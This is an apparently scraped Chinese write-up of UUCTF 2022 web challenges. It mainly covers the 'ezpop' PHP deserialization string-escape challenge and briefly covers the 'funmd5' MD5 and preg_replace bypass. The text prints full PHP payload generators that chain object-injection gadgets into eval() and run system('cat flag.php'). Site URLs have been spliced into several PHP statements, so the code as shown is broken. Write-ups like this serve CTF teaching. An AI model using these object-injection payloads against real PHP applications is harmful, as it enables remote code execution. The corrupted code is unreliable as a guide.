2022UUCTF--WEB( 三 ) _生活百科

文章插圖
輸出flag

文章插圖
ezpop -- 字符串逃逸打開題目給出的就是源碼

//flag in flag.phperror_reporting(0);class UUCTF{public $name,$key,$basedata,$ob;function __construct($str){$this->name=$str;}function __wakeup(){if($this->key==="UUCTF"){$this->ob=unserialize(base64_decode($this->basedata));}else{die("oh!you should learn PHP unserialize String escape!");}}}class output{public $a;function __toString(){$this->a->rce();}}class nothing{public $a;public $b;public $t;function __wakeup(){$this->a="";}function __destruct(){$this->b=$this->t;die($this->a);}}class youwant{public $cmd;function rce(){eval($this->cmd);}}$pdata=https://www.huyubaike.com/biancheng/$_POST["data"];if(isset($pdata)){$data=https://www.huyubaike.com/biancheng/serialize(new UUCTF($pdata));$data_replace=str_replace("hacker","loveuu!",$data);unserialize($data_replace);}else{highlight_file(__FILE__);}?>

考點就是字符串逃逸，剛開始直接序列化UUCTF類，經過替換之后5字符變6字符，我們沒有給$this->key直接賦值但是要求是UUCTF才可以繼續下去，所以通過字符串逃逸間接給key賦值
if($this->key==="UUCTF"){$this->ob=unserialize(base64_decode($this->basedata));}我們在本地一步一步測試
首先隨便輸入根據輸出構造，測試發現進入了我們的目標

O:5:"UUCTF":4:{s:4:"name";s:"1";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}O:5:"UUCTF":4:{s:4:"name";s:" ";s:3:"key";s:5:"UUCTF";s:8:"basedata";N;s:2:"ob";N;} ";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";N;s:2:"ob";N;}

【2022UUCTF--WEB】

文章插圖
然后構造執行命令的那塊POC

class output{public $a;function __toString(){//1、調用目的函數__toString 對象實例被當作字符串處理調用$this->a->rce();}}class nothing{public $a;public $b;public $t;function __wakeup(){$this->a="";}function __destruct(){//2.要繞過__wakeup 但是這里php版本是7.2.34 不能利用多寫參數繞過 我們還是利用引用繞過$this->b=$this->t;// 這里返回的是字符串die($this->a);}}class youwant{public $cmd;function rce(){// 終點eval($this->cmd);}}

POC

<?phpclass output{public $a;function __construct(){$this->a=new youwant();}}class nothing{public $a;public $b;public $t;function __construct(){$this->a=&$this->b;$this->b='xx';$this->t=new output();}}class youwant{public $cmd;function __construct(){$this->cmd="phpinfo();";}}echo(base64_encode(serialize(new nothing())));

將上面兩處的構造的結合起來的payload

<?phpclass output{public $a;function __construct(){$this->a=new youwant();}}class nothing{public $a;public $b;public $t;function __construct(){$this->a=&$this->b;$this->b='xx';$this->t=new output();}}class youwant{public $cmd;function __construct(){$this->cmd="phpinfo();";}}$basedata = https://www.huyubaike.com/biancheng/(base64_encode(serialize(new nothing())));$str ='";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';echo $str."\n";$hacker='';for($i=0;$i<strlen($str);$i++){$hacker.='hacker';}$payload = $hacker.$str;echo $payload;

執行效果

文章插圖
找flag在當前目錄的flag.php

<?phpclass output{public $a;function __construct(){$this->a=new youwant();}}class nothing{public $a;public $b;public $t;function __construct(){$this->a=&$this->b;$this->b='xx';$this->t=new output();}}class youwant{public $cmd;function __construct(){$this->cmd="system('cat flag.php');";}}$basedata = https://www.huyubaike.com/biancheng/(base64_encode(serialize(new nothing())));$str ='";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';$hacker='';for($i=0;$i<strlen($str);$i++){$hacker.='hacker';}$payload = $hacker.$str;echo $payload;

文章插圖
funmd5--對代碼的理解打開題目直接源碼
重點
if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){echo "well!you win again!now flag is yours.<br>";echo $flag;}我們知道$md5[0]==md5($md5[0])繞過可以使用0e215962017，但是還要繞過preg_replace使用%0a，我們審計代碼發現，后面有對md5[0]的截取我們只要保證$sub=1從第一位開始截取，就可以避免%0a ，而且$sub的值是當前時間的最后一位，也就是保證當前的時間為xxxxxxxx1即可